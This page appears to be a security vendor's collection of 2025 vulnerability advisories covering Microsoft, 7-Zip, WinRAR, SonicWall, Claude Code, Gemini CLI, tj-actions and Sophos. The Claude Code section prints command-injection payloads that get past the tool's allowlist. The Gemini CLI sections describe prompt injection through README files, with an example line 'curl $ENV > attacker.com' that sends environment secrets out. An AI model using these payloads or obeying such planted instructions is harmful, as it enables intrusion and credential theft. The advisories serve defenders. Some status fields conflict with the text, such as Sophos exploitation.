Security advisory

Security Advisory

Microsoft IIS Web Deploy RCE Vulnerability Allows Authenticated Remote Code Execution 

Summary of Vulnerability in Microsoft Web Deploy 4.0 (CVE-2025-53772) revels critical security flaw that could be exploited by authenticated attackers to execute code on affected systems. This is the bug disclosed on August 12, 2025, with a CVSS score of 8.8, indicating high severity.

Severity High 
CVSS Score 8.8 
CVEs CVE-2025-53772 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

A vulnerability in Microsoft Web Deploy 4.0 (CVE-2025-53772) allows authenticated attackers to remotely execute arbitrary code on affected systems.

The issue arises from the insecure deserialization of untrusted data. Due to its low privilege requirements and lack of user interaction, this flaw poses a significant threat, especially in enterprise deployment environments. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Web Deploy Remote Code Execution via Deserialization  CVE-2025-53772 Microsoft Web Deploy 4.0  High  10.0.2001 or later 

Technical Summary 

The vulnerability stems from insecure deserialization of untrusted data (CWE-502), allowing remote attackers to craft malicious HTTP requests that trigger code execution on the web server. This flaw enables remote code execution (RCE) under specific conditions, where the attacker must have authenticated access and network connectivity.

The attack is network-based, requires only low-privilege access and does not rely on user interaction. Successful exploitation can result in a high impact on confidentiality, integrity and availability of the affected system. As of the time of publication, no public exploit has been reported and the exploit maturity is considered unproven. 

CVE ID CVSS Score System Affected  Vulnerability Details Impact 
CVE-2025-53772 8.8 Microsoft Web Deploy 4.0 Web Deploy deserializes untrusted input, allowing remote attackers to execute arbitrary code. Remote Code Execution 

Recommendations: 

Here are some recommendations below 

  • Apply Microsoft Web Deploy version 10.0.2001 or latest version. 
  • Limit access to Web Deploy endpoints to trusted IP ranges or internal networks only. 
  • Audit logs for unusual HTTP POST activity to Web Deploy endpoints. 

Conclusion: 
While CVE-2025-53772 has not yet been publicly exploited, the nature of the flaw and the ease of attack (low privileges, no user interaction) significantly increases the risk of widespread exploitation, particularly in enterprise deployment environments.

Organizations using Microsoft Web Deploy 4.0 should update and apply the latest patch without delay.

This vulnerability affects Web Deploy 4.0 and requires low privileges to exploit, making it particularly concerning for organizations that use this deployment tool in their infrastructure. The vulnerability allows an authenticated attacker to exploit the system via low-complexity network-based attacks. 

References

Security Advisory

Microsoft Patch Tuesday August Patches 119 Vulnerabilities; Publicly Disclosed Kerberos Zero‑Day

Microsoft Patch Tuesday : Key points:

119 vulnerabilities discovered & 13 are classified as Critical rating meaning as per Microsoft’ they could be abused by malware or malcontents to gain remote access to a Windows system with little or no help from users.

CVE-2025-53779 is Windows Kerberos Elevation of Privilege Vulnerability

The vulnerabilities fall into multiple categories, including Remote Code Execution (RCE), Elevation of Privilege (EoP), Information Disclosure, Spoofing, Denial of Service (DoS), and Tampering. Below is a detailed breakdown of the vulnerabilities by category, along with key insights for organizations to prioritize their patching efforts.

OEM Microsoft 
Severity Critical 
Date of Announcement 2025-08-12 
No. of Patches  119 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

Microsoft has released security updates addressing 119 vulnerabilities in the August 2025 Patch Tuesday cycle, including one publicly disclosed zero-day in Windows Kerberos. Of these, 13 are classified as Critical, covering a wide range of products such as Windows components, Office, Azure, Exchange and SharePoint. 

  • 111 Microsoft CVEs addressed 
  • 8 non-Microsoft CVEs addressed 

Breakdown of August 2025 Vulnerabilities 

  • 44 Elevation of Privilege Vulnerabilities 
  • 35 Remote Code Execution Vulnerabilities 
  • 18 Information Disclosure Vulnerabilities 
  • 9 Spoofing Vulnerabilities 
  • 4 Denial of Service Vulnerabilities 
  • 1 Tampering vulnerabilities 
Vulnerability Name CVE ID Product Affected Severity CVSS Score 
Windows Kerberos Elevation of Privilege Vulnerability CVE-2025-53779 Windows Server 2025 High 7.2 

Technical Summary 

The August 2025 Patch Tuesday addresses a publicly disclosed zero-day vulnerability CVE-2025-53779 in Windows Kerberos.

This elevation of privilege flaw, related to improper path handling in domain-managed service accounts (dMSA), could allow a local attacker to gain domain administrator privileges.

Microsoft also patched several critical Remote Code Execution (RCE) vulnerabilities across Windows Graphics, GDI+, Office, DirectX, and Hyper-V. Many of these vulnerabilities require minimal or no user interaction, such as simply opening a file in the preview pane or processing crafted image or network messages, making them high-risk for enterprise environments. 

CVE ID System Affected Vulnerability Details Impact 
CVE-2025-53779 Microsoft Windows Server 2025 Relative path traversal in Windows Kerberos allows an authorized attacker to elevate privileges over a network. Privilege escalation 

Source: Microsoft and NVD 

In addition to the publicly disclosed vulnerability, several other critical and high-severity issues were addressed: 

  • CVE202550165 and CVE202553766: Graphics-related RCEs, particularly vulnerable due to their ability to execute code without user interaction and potential wormable behavior. 
  • CVE202553792: Azure Portal, privilege escalation vulnerability, critical impact on cloud administration surface. 
  • CVE202550171: Remote Desktop Server, allows remote code execution over RDP. 
  • CVE202553778: Windows NTLM, elevation of privilege exploitation includes lateral movement across enterprise networks. 
  • CVE202553786: Microsoft Exchange Server, hybrid environment vulnerability with potential for cloud environment hijacking. 

Key Affected Products and Services 

The vulnerabilities addressed in August 2025 impact a wide range of Microsoft products and services, including: 

  • Windows Core and Authentication Systems 

Includes fixes in Windows Server (Kerberos), Windows Graphics Component, GDI+, DirectX Graphics Kernel, NTLM, Hyper‑V, MSMQ, Remote Desktop and more. 

  • Microsoft Office Suite and Productivity Tools 

Microsoft Office and Word, notably through Preview Pane RCE flaws, as well as SharePoint (RCE and EoP), Exchange Server (Privilege Escalation in hybrid setups) and Teams. 

  • Cloud and Azure Ecosystem 

Critical issues in Azure Virtual Machines (spoofing and info disclosure), Azure Stack Hub and potentially Azure Portal. 

  • Virtualization and Hypervisor Technologies 

Updates include vulnerabilities in Hyper‑V (RCE and privilege escalation) and DirectX graphics kernel components relevant to virtualization. 

  • Development Tools 

Fixes include vulnerabilities affecting Visual Studio and GitHub Copilot, reinforcing development environments. 

  • Messaging and Queuing Services 

Includes a critical RCE in Microsoft Message Queuing (MSMQ). 

  • Browsers: 
    Microsoft Edge (Chromium-based). 

Remediation

  • Apply Patches Promptly: Install the August 2025 security updates immediately to mitigate risks. 

Conclusion: 

Microsoft’s August 2025 Patch Tuesday, disclosed zero-day CVE-2025-53779 is another privilege escalation flaw in Windows Kerberos that stems from a case of relative path traversal. Akamai researcher Yuval Gordon has been credited with discovering and reporting the bug.

Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services.

References

Security Advisory

7-Zip Security Flaw Allows Malicious File Writes and Potential Exploits 

Summary Security Advisory: 7-Zip Security Flaw

A vulnerability in 7-Zip (versions before 25.01) allows attackers to abuse symbolic links in archive files to write files outside the intended extraction directory.

Severity Low 
CVSS Score 3.6 
CVEs CVE-2025-55188 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

This can lead to overwriting sensitive files, potentially enabling code execution or privilege escalation. The flaw is primarily exploitable on Linux systems due to common file permission models but can also impact Windows under specific conditions. Affected archive formats include ZIP, TAR, 7Z and RAR. 

The security flaw was  reported and discoverd by security researcher lunbun, who identified that 7-Zip fails to properly validate symbolic links when extracting certain archive formats.

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ 7-Zip Arbitrary File Write via Symbolic Link Flaw  CVE-2025-55188 7-Zip  Low  25.01 and later. 

Technical Summary 

Cause: Improper validation of symbolic links during archive extraction. 

Attack Vector: Malicious archives can contain symlinks pointing outside the extraction directory. 

Impact: Overwrites arbitrary files on the system. On Linux, this can replace startup scripts, configuration files, or binaries to gain elevated privileges. On Windows, exploitation requires write access to target paths. 

Affected Formats: ZIP, TAR, 7Z, RAR. 

CVE ID CVSS Score System Affected  Vulnerability Details Impact 
CVE-2025-55188 3.6 Linux, Windows 7-Zip versions 7-Zip mishandles symbolic links in archives, letting attackers write files anywhere on the system during extraction. Code execution, Privilege escalation 

Recommendations: 

Here are some recommendations below 

  • Update 7-Zip to version 25.01 or latest one.  
  • Avoid extracting archives from untrusted sources. 
  • Always consider using sandboxed environments for unknown files extraction. 

Conclusion: 
While CVE-2025-55188 carries a low CVSS score, the real-world impact can be severe in certain environments, especially on Linux systems with high-privilege extraction processes.

Immediate patching to 7-Zip 25.01 or later is strongly advised to mitigate the risk of arbitrary file overwrite attacks. 

The researcher has submitted a request for reevaluation of the CVSS score and offered to provide proof-of-concept demonstrations to package repository maintainers who require additional verification.

References

Security Advisory

WinRAR Zero-Day Path Traversal Flaw Actively Exploited to Code Execution 

Security advisory: A zero-day path traversal vulnerability has been discovered in the Windows version of a popular file archiver utility, WinRAR. The vulnerability tracked as CVE-2025-8088, affects multiple Windows-based WinRAR an components, which has already been exploited in the wild.

Severity High 
CVSS Score 8.4 
CVEs CVE-2025-8088 
POC Available Yes 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 
This flaw allows attackers to manipulate the extraction path of files from a malicious archive, enabling them to place arbitrary code file in sensitive system folders, overwrite important files and even execute malicious code immediately upon extraction. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Path Traversal Vulnerability   CVE-2025-8088  WinRAR (Windows versions), RAR, UnRAR, portable UnRAR (Windows), UnRAR.dll 8.4  WinRAR 7.13 

Technical Summary 

When extracting files, vulnerable versions of WinRAR could be tricked into using a maliciously crafted file path embedded inside an archive rather than the user’s intended extraction directory. This occurs when the extraction process fails to properly validate and sanitize file paths before writing them to disk. 
As a result, attackers can: 

  • Place malicious files in protected system directories. 
  • Overwrite critical system/application files. 
  • Trigger automatic execution of malware without further user action. 

Most common attack vector involves sending a malicious archive via phishing or other social engineering techniques. When opened with a vulnerable WinRAR version, the malware is silently deployed and executed. 

Unix versions of RAR, UnRAR, UnRAR library, RAR for Android are not affected for this vulnerability. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-8088 WinRAR and related components on Windows version (RAR, UnRAR, portable UnRAR, UnRAR.dll) Flawed extraction path handling allows files to be placed outside the intended extraction directory. Allows arbitrary file placement, overwriting critical files, and executing malicious code without user interaction. 

Recommendations

Here are the recommendations below you can follow 

  • Update immediately to WinRAR 7.13 or newer version from the official WinRAR website. 
  • Avoid extracting archives from untrusted or unknown sources. 
  • Enable endpoint protection and ensure it scans archives before extraction. 
  • Audit your system for unusual or unauthorized files in system directories. 

Conclusion: 
CVE-2025-8088 shows that even widely trusted tools like WinRAR can become high-risk targets when flaws allow silent malware deployment during normal usage. Given that this zero-day has already been exploited, updating to WinRAR 7.13 immediately is crucial. Additionally, users should avoid extracting files from unknown sources and maintain strong endpoint protection. 

References

Security Advisory

Zero-Day Exploitation in SonicWall Targeted by Akira Ransomware 

Summary 

A critical zero-day vulnerability is suspected in SonicWall SSL VPN appliances, which are currently being actively exploited by threat actors linked to the Akira ransomware group. These attacks began last month and exploit even fully patched devices and systems with multi-factor authentication (MFA) enabled. In many cases, attackers move quickly, encrypting victim systems within hours of gaining access. 

Detailed Observation 

The ongoing attacks targeting SonicWall SSL VPN appliances suggest the presence of a zero-day vulnerability that allows threat actors to gain unauthorized access to enterprise networks.

This exploitation may be limited to TZ and NSa-series SonicWall firewalls with SSLVPN enabled. The attack patterns indicate that the attackers may be exploiting a flaw in the VPN’s authentication or session management mechanisms which they can be able to bypass the MFA.

Security researchers also observed that the threat actors often used legitimate credentials, including recently rotated passwords, implying either credential theft or session hijacking.

These login attempts were traced back to Virtual Private Servers (VPS), a common tactic to obscure the attacker’s origin. Once threat actors on the network, they abuse the privileged accounts, then start establishing C2 and move laterally in the network, then at the last stage before deploying the ransomware they are disabling the defenses to smooth deploy.

The ransomware group suggests Akira, has been seen deploying malware and encrypting data within hours, showcasing a high level of automation and operational efficiency.

The pattern and speed of these attacks point to a well-orchestrated campaign that likely began months earlier (as early as October 2024) but surged in mid-July 2025. This level of sophistication, combined with the failure of traditional defenses, strongly supports the theory that attackers are leveraging an undisclosed vulnerability in SonicWall’s SSL VPN stack. 

Remediation

Until an official SonicWall patch is released, organizations should take the following immediate actions: 

  • Disable SonicWall SSL VPN if possible, especially for external access. 
  • Enforce network segmentation to limit the radius of any potential breach. 
  • Monitor access logs for suspicious login attempts (especially from VPS-hosting IP ranges). 
  • Block known malicious IPs and ASNs used in previous attacks. 
  • Rotate all VPN credentials, especially for admin or privileged users. 
  • Harden MFA configuration (though current evidence shows bypasses are possible). 
  • Enable IP reputation and botnet protection features in SonicWall firewalls. 
  • Audit all VPN user accounts, removing any inactive or unnecessary ones. 

IOCs 

Attacker IP Threat Actors used tools ASN/CIDR hosting adversary infrastructure User & Password created  
42.252.99[.]59 w.exe AS24863 – LINK-NET – 45.242.96.0/22 backupSQL (U) 
45.86.208[.]240 win.exe AS62240 – Clouvider – 45.86.208.0/22 lockadmin (U) 
77.247.126[.]239 C:\ProgramData\winrar.exe AS62240 – Clouvider – 77.247.126.0/24 Password123$ (P) 
104.238.205[.]105 C:\ProgramData\OpenSSHa.msi AS23470 – ReliableSite LLC – 104.238.204.0/22 Msnc?42da (P) 
104.238.220[.]216 C:\Program Files\OpenSSH\sshd.exe AS23470 – ReliableSite LLC – 104.238.220.0/22 VRT83g$%ce (P) 
181.215.182[.]64 C:\programdata\ssh\cloudflared.exe AS174 – COGENT-174 – 181.215.182.0/24  
193.163.194[.]7 C:\Program Files\FileZilla FTP Client\fzsftp.exe AS62240 – Clouvider – 193.163.194.0/24  
193.239.236[.]149 C:\ProgramData\1.bat AS62240 – Clouvider – 193.239.236.0/23  
194.33.45[.]155 C:\ProgramData\2.bat AS62240 – Clouvider – 194.33.45.0/24  
  • Source: huntress.com 

Conclusion: 
The exploitation of a suspected zero-day in SonicWall SSL VPN poses an immediate and critical threat to enterprise environments.

The ability of attackers to bypass authentication and deploy ransomware within hours is highly dangerous and points to a sophisticated, active campaign.

Organizations using SonicWall VPNs must take preemptive steps now, including disabling VPN access if feasible and aggressively monitoring for anomalies, until SonicWall releases a formal patch or mitigation advisory 

References

Uncategorized

Patch Now! Claude Code Vulnerabilities Allow Unauthorized Command Execution, CVEs Affect AI Security Foundations 

Summary 

Anthropic’s Claude Code gained traction as a powerful AI coding assistant and promises developers a safe and streamlined way to build with Claude’s capabilities. But recently two high-severity vulnerabilities have been discovered in Claude Code, Anthropic’s AI-powered coding assistant. These flaws allow attackers to escape security restrictions and execute arbitrary system commands.

AI coding assistant was meant to enforce restrictions but unknowingly reveals how to bypass them. Threat researchers from Cymulate discovered two high-severity vulnerabilities in Claude Code, which were quickly addressed by the team.

These issues allowed me to escape its intended restrictions and execute unauthorized actions, all with Claude’s own help.

Severity High 
CVSS Score 8.7 
CVEs CVE-2025-54794, CVE-2025-54795 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 
Notably, Claude’s own feedback mechanisms were leveraged by attackers to refine and optimize their payloads. 

These CVEs highlight how generative AI tools can be manipulated into aiding exploitation attempts, demonstrating the risks of integrating AI into secure development workflows. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Path Restriction Bypass  CVE-2025-54794  Claude Code < v0.2.111 7.7  v0.2.111 
Command Injection CVE-2025-54795 Claude Code < v1.0.20 8.7 v1.0.20 

Technical Summary 

CVE-2025-54794 – Directory Restriction Bypass  

Claude Code tried to keep file access safe by only allowing work in certain folders. But it used a weak method to check file paths it just checked if the file name started with an allowed folder name. An attacker could create a folder with a similar name (like /tmp/allowed_dir_malicious) and trick Claude into thinking it was safe.

This could allow attackers to reach outside the safe folder, read secret files or even access system settings. Using symbolic links, attackers could also jump to important files that should never be touched. 

CVE-2025-54795 – Command Injection 

Claude only allows certain commands, like echo or ls, to run. But there was a mistake in how it cleaned user input. Attackers could hide harmful commands inside allowed ones. Example – echo “\”; <MALICIOUS_COMMAND>; echo \”” tricks Claude into running the attacker’s command between two harmless echo commands. 

Even worse, Claude helped improve these attack attempts. When a try failed, the attacker asked Claude why it didn’t work. Claude explained the problem and suggested fixes leading to successful attacks. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-54794 Claude Code versions below v0.2.111 Claude used a weak prefix matching to check if files were inside a safe folder. Attackers could create folders with similar names to bypass these checks. Attackers can escape the sandbox, access sensitive files, and potentially escalate system privileges. 
CVE-2025-54795 Claude Code versions below v1.0.20 Claude allowed only safe commands, but input was not cleaned properly. Attackers could hide malicious commands inside allowed ones like echo. Attackers can run harmful commands, open applications, and possibly install malware or backdoors. 

POC Available: 

This vulnerability exploits a weakness in how Claude handles whitelisted command strings. Improper input sanitization allows attackers to inject arbitrary shell commands using echo, bypassing any user prompt or approval. 

  1. Exploitation Steps (PoC) 

Step 1 – Try a basic payload 

echo “test”; ls -la ../restricted (This gets flagged by Claude, and it asks for user confirmation) 

Step 2 – Refined working payload

echo “\”; ls -la ../restricted; echo \”” 

Claude executes this without a prompt

Lists a directory (../restricted) outside the current working directory, which should not be accessible. 

Step 3 – Execute arbitrary system command (e.g., launch Calculator) 

echo “\”; open -a Calculator; echo \”” 

This launches the Calculator app without any user approval

  1. Why Did This Work? 
  1. Improper Input Escaping: 
    Claude Code embeds user input into echo “<input>“ but doesn’t properly sanitize or escape the contents. 
  1. Payload Explains the Exploit: 
  • echo “\”; → closes the initial string 
  • COMMAND → injects and executes arbitrary command 
  • ; echo \”” → reopens the string to make it appear valid 
  • Claude sees this as just another harmless echo command 
  • Since echo is whitelisted, it runs automatically 
  • The attacker’s payload slips through the gap and executes 
  • If the Claude Code is running with higher privileges, attackers can perform Local Privilege Escalation (LPE) 

Remediation

  • Update immediately Claude   

For CVE-2025-54794 → Update to v0.2.111 or later 

For CVE-2025-54795 → Update to v1.0.20 or later 

  • Check logs and systems where Claude was used for suspicious behavior.  
  • Don’t allow untrusted files or user input into Claude’s coding environment. 

Conclusion: 
These vulnerabilities highlight a growing concern in AI-assisted development, the AI’s ability to assist malicious users. Claude Code not only allowed abuse through technical flaws, but also helped attackers refine and improve their exploitation strategy. 

Organizations leveraging AI in development pipelines must apply the same rigor used for traditional tools, enforce strict input validation, isolate environments and assume AI can be misled or exploited. 

Anthropic’s security and engineering teams has been fast with their professional response and smooth coordination during disclosure.

References

Blogs Security Advisory

Analyzing the newly discovered Vulnerability in Gemini CLI; Impact on Software coding

Google’s Gemini command line interface (CLI) AI agent

Its not been one month when Google’s Gemini CLI vulnerability discovered by Tracebit researchers and found attackers could use prompt injection attacks to steal sensitive data.

Google’s Gemini CLI, an open-source AI agent for coding could allow attackers exploit to hide malicious commands, using “a toxic combination of improper validation, prompt injection and misleading UX,” as Tracebit explains.

After reports of the vulnerability surfaced, Google classified the situation as Priority 1 and Severity 1 on July 23, releasing the improved version two days later.

Those planning to use Gemini CLI should immediately upgrade to its latest version (0.1.14). Additionally, users could use the tool’s sandboxing mode for additional security and protection.

Disclosure of the vulnerability

Researchers reported on vulnerability directly to Google through its Bug Hunters programme. According to a timeline provided by Tracebit, the vulnerability was initially reported to Google’s Vulnerability Disclosure Programme (VDP) on 27 June, just two days after Gemini CLI’s public release.

Impact of the vulnerability

A detailed analysis found that in the patched version of Gemini CLI, attempts at code injection display the malicious command to users. This require explicit approval for any additional binaries to be executed. This change is intended to prevent the silent execution that the original vulnerability enabled.

Tracebit’s researchers played an important role in discovering and reporting the issue which is symbol of independent security research, particularly as AI-powered tools become central to software development workflows.

LLM integral to software development but hackers are using it too

Gemini CLI integrates Google’s LLM with traditional command line tools such as PowerShell or Bash. This allows developers to use natural language prompts to speed up tasks such as analyzing and debugging code, generating documentation, and understanding new repositories (“repos”).

As developers worldwide are using LLMs to help them develop code faster, attackers worldwide are using LLMs to help them understand and attack applications faster. 

Tracebit also discovered that malicious commands could easily be hidden in Gemini CLI This is possible by by packing the command line with blank characters, pushing the malicious commands out of the user’s sight.

More vigilance required when examining and running third-party or untrusted code, especially in tools leveraging AI to assist in software development.

Through the use of LLMs, AI excels at educating users, finding patterns and automate repetitive tasks.

Sam Cox, Tracebit’s founder, says he personally tested the exploit, which ultimately allowed him to execute any command — including destructive ones. “That’s exactly why I found this so concerning,” Cox told Ars Technica. “The same technique would work for deleting files, a fork bomb or even installing a remote shell giving the attacker remote control of the user’s machine.”

Source: https://in.mashable.com/tech/97813/if-youre-coding-with-gemini-cli-you-need-this-security-update

Security Advisory

Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems 

Summary 

Security Advisory :

In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface. 

This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows. 

Vulnerability Details 

Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection. 

A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation. 

To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands. 

Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system. 

Attack Flow 

Step Description 
1. Craft Malicious prompt injections are embedded inside context files like README.md along with benign code. 
2. Deliver Malicious repository is cloned or reviewed by a developer using Gemini CLI. 
3. Trigger Gemini CLI loads and interprets the context files. 
4. Execution Malicious code is executed due to weak validation and implicit trust. 
5. Exfiltrate Environment variables or secrets are silently sent to attacker-controlled servers. 

Proof-of-Concept Snippet 

Source: Tracebit 

Why It’s Effective 

  • Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny. 
  • Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands. 
  • Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools. 

Broader Implications 

Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk. 

Remediation

  • Upgrade Gemini CLI to version 0.1.14 or later. 
  • Enable sandboxing modes where it is possible to isolate and protect systems. 
  • Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards. 
  • Review and monitor command execution prompts carefully 

Conclusion: 
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code. 

Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines. 

References

Security Advisory

Critical Vulnerability identified in tj-actions/branch-names’ GitHub Action workflow

Security advisory:  Patch Now! Critical Command Injection in GitHub Action tj-actions/branch-names Affects 5,000+ public repositories. 

Summary:

A critical vulnerability has been identified in the tj-actions/branch-names’ GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags.

Severity Critical 
CVSS Score 9.1 
CVEs CVE-2025-54416 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No
Advisory Version 1.0 

Overview 
This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0

The flaw allows attackers to run any command during GitHub Actions workflows by creating specially crafted branch names or tags.  

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Command Injection in branch-names GitHub Action  CVE-2025-54416   tj-actions/branch-names GitHub Action <v8.2.1 9.1  v9.0.0 or later 

Technical Summary 

This Vulnerability puts many CI/CD pipelines at serious risk, including the possibility of stealing secrets or injecting malicious code into releases.

The vulnerability exists due to unsafe usage of the eval command in the action’s script. Although some escaping was done using printf “%q”, developers later used eval printf “%s” to unescaped values, which reintroduced command injection risks.

Any branch name containing malicious shell code can trigger execution during workflows. 

The vulnerability affects GitHub Action workflows that use tj-actions/branch-names. It allows attackers to inject and execute arbitrary shell commands by creating a branch with malicious content. The issue is caused by the unsafe use of eval when handling branch names and tags in output generation. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-54416 GitHub repositories using tj-actions/branch-names < v8.2.1 Unsafe use of eval leads to command injection Attacker can run arbitrary commands, steal secrets, alter source code, or compromise workflows 

Proof of Concept (POC) 


 
Remediation

  • Update immediately to tj-actions/branch-names version v9.0.0 or higher
  • The vulnerable eval code has been replaced with safe printf usage. 
  • Review your workflows to ensure no malicious activity has occurred. 
  • Check logs for strange branch names or unexpected shell activity. 

Conclusion: 
This command injection flaw is extremely dangerous due to its simplicity and the number of projects it affects. GitHub Actions workflows that use branch names or tags from pull requests are especially at risk. Attackers don’t need access to the code just the ability to open a pull request.

All developers and security teams should act now by updating to the latest version and reviewing usage of GitHub Actions in their workflows. 

References

Security Advisory

Pre-Auth Remote Code Execution Flaws Patched in Sophos Firewall 

Summary : Sophos has resolved several critical security vulnerabilities in its Firewall products, the most severe vulnerability could allow remote code execution without authentication, potentially giving attackers full control over impacted systems.

OEM Sophos 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-6704, CVE-2025-7624 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

To address the issue, the Sophos has issued hotfixes for five separate vulnerabilities. Two of these are rated as critical and present a serious threat to enterprise networks around the globe. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Arbitrary file writing vulnerability in Secure PDF eXchange (SPX) feature  CVE-2025-6704 Sophos Firewall Critical   SFOS 21.0 MR2 (21.0.2) and later 
SQL injection vulnerability in legacy SMTP proxy CVE-2025-7624 Sophos Firewall Critical SFOS 21.0 MR2 (21.0.2) and later 

Technical Summary 

The CVE-2025-6704 and CVE-2025-7624 are identified in Sophos Firewall versions prior to 21.0 MR2 (21.0.2), both with a CVSS v3.1 base score of 9.8, indicating critical severity.  

The CVE-2025-6704 involves an arbitrary file writing vulnerability within the Secure PDF eXchange (SPX) feature.

SPX is enabled and the firewall operates in High Availability (HA) mode, attackers can exploit this flaw to execute arbitrary code remotely without authentication. This pre-authentication remote code execution can lead to full system compromise, affecting confidentiality, integrity and availability. 

CVE-2025-7624 pertains to an SQL injection vulnerability in the legacy (transparent) SMTP proxy of Sophos Firewall. If a quarantining policy is active for email and the system was upgraded from a version older than 21.0 GA, this weakness could potentially allow remote code execution.

Exploitation of this flaw can lead to unauthorized access, manipulation of firewall configurations, and potential lateral movement within the network. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025-6704 v21.5 GA and older A rare SPX feature flaw in HA mode can allow pre-auth remote code execution, affecting 0.05% of devices.  Pre-auth remote code execution (RCE) in Sophos Firewall SPX feature 
CVE-2025-7624 v21.5 GA and older An SQL injection in the legacy SMTP proxy can enable remote code execution if email quarantine is active and SFOS was upgraded from pre-21.0 GA. It affects up to 0.73% of devices. Remote code execution via SMTP proxy 

In addition to the Critical Severity vulnerabilities, two other High and one medium severity issues were addressed. 

CVE-2025-7382 – Command Injection in WebAdmin Interface (CVSS 8.8) 

A WebAdmin command injection flaw allows adjacent pre-auth code execution on HA auxiliary devices if admin OTP is enabled.  

CVE-2024-13974 – Business Logic Vulnerability in Up2Date Component (CVSS 8.1) 

 A business logic flaw in Up2Date lets attackers control firewall DNS to enable remote code execution. 

CVE-2024-13973 – Post-Auth SQLi Vulnerability in WebAdmin (CVSS 6.8) 

A post-auth SQL injection in WebAdmin allows admins to execute arbitrary code. 

Remediation

Users should immediately update Sophos Firewall to the latest patched version: 

  • For CVE-2025-6704, CVE-2025-7624, CVE-2025-7382: Upgrade to Sophos Firewall 21.0 MR2 (21.0.2) or later. 
  • For CVE-2024-13974 and CVE-2024-13973: Upgrade to Sophos Firewall 21.0 MR1 (20.0.1) or later. 

If you are not using the Secure PDF eXchange (SPX) feature or legacy SMTP proxy, consider disabling them until they are patched. 

Users operating legacy versions prior to the supported range must upgrade their systems to receive these critical security protections and maintain adequate defense against potential exploitation attempts.

Conclusion: 
In Sophos Firewalls that allow attackers to execute code remotely without logging in. Although only a small percentage of devices are affected, the flaws are serious.

Fortunately, Sophos quickly pushed automatic fixes, and no attacks have been seen so far. Users should verify their firewalls are fully updated and have auto update enabled to stay protected. 

The impact scope for this vulnerability reaches up to 0.73% of deployed devices. Both critical vulnerabilities were discovered and responsibly disclosed through Sophos’ bug bounty program by external security researchers.

References

Scroll to top